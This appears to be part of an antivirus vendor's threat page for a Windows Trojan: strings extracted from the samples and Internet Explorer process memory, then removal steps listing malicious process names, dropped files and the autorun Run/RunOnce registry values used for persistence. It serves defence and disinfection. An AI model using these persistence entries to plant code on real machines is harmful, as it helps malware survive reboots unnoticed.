GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
Unknown custom message name "%s"
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
%u.%.2u.%u
SUPPRESSIBLEMSGBOX
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
GetWindowsVersionEx
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
IMsgt
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
FTPF0P
0123456789abcdefInno Setup Setup Data (5.5.7)
Inno Setup Messages (5.5.3)
CEw.AEw
oleaut32.dll
RegQueryInfoKeyA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetWindowsDirectoryA
CreateNamedPipeA
mpr.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
comctl32.dll
ole32.dll
ShellExecuteExA
ShellExecuteA
comdlg32.dll
msimg32.dll
.text
`.rdata
@.data
.pdata
@.rsrc
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXMZ
`.data
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryW
RegOpenKeyA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
OnKeyDown
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
Cannot assign a %s to a %s
Cannot create file %s
Cannot open file %s
Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance
Class %s not found
Resource %s not found!Resource %s is of incorrect class
List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates
Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name
A class named %s already exists#''%s'' is not a valid integer value
Error reading %s.%s: %s
Ancestor for '%s' not found
Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application
Could not load CARDS.DLL
Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Grid too large for operation Too many rows or columns deleted
%s on line %d
''%s'' expected
%s expected
Invalid input value7Invalid input value. Use escape key to abandon changes
Value must be between %d and %d<Cannot create a default method name for an unnamed component
''%s'' is not a valid date
''%s'' is not a valid time#''%s'' is not a valid date and time
Invalid file name - %s
All files (*.*)|*.*
&Files: (*.*)
Invalid clipboard format Clipboard does not support Icons
Custom Colors Operation not supported on selected printer.There is no default printer currently selected
Unable to write to %s
Invalid data type for '%s'
Failed to create key %s
Failed to set data for '%s'
Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)
/Menu '%s' is already being used by another form
Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s
Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.52.0.0

iexplore.exe_2680:

.text
`.data
.rsrc
@.reloc
Bv.TBv
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_3920:

.text
`.data
.rsrc
@.reloc
Bv.TBv
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

iexplore.exe_2164:

.text
`.data
.rsrc
@.reloc
Bv.TBv
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    SecondL.exe:2360
    b5rtg3zapo3.exe:1652
    advise.exe:3444
    PsVMEKV4knRwp57KTHIw.exe:2980
    %original file name%.exe:1828
    up.exe:2324
    caster19.exe:2672
    caster12.exe:3192

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\4lqucguhhjm\b5rtg3zapo3.exe (40036 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1404 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (1404 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1404 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BLNU1.tmp\b5rtg3zapo3.tmp (1596 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PsVMEKV4knRwp57KTHIw.exe (4928 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RW4BpXx91k.exe (40552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\up.exe (152871 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\SecondL.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\up.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (31 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster19.exe.config (1 bytes)
    C:\config.conf (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster12.exe (3070 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\advise.exe (156286 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster12.exe.config (1 bytes)
    %Program Files%\UPT95S6V7I\cast.config (38 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\itdownload.dll (1489 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\idp.dll (1502 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\psvince.dll (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (38 bytes)
    %Program Files%\UPT95S6V7I\uninstaller.exe.config (1 bytes)
    %Program Files%\UPT95S6V7I\UPT95S6V7.exe (46396 bytes)
    %Program Files%\UPT95S6V7I\UPT95S6V7.exe.config (1 bytes)
    %Program Files%\S5XXHD713O\cast.config (38 bytes)
    %Program Files%\S5XXHD713O\S5XXHD713.exe.config (1 bytes)
    %Program Files%\S5XXHD713O\uninstaller.exe.config (1 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_X2481" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PsVMEKV4knRwp57KTHIw.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OTUTPRODUCT_EMMLQ" = "C:\%original file name%.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "2XEC55JKCEAFOYK" = "%Program Files%\UPT95S6V7I\UPT95S6V7.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "5739710" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\4lqucguhhjm\b5rtg3zapo3.exe /VERYSILENT"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "FU5JGMAB1J9RQTX" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RW4BpXx91k.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "YCPAP0FFQR1222R" = "%Program Files%\S5XXHD713O\S5XXHD713.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 2 (1 vote)

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now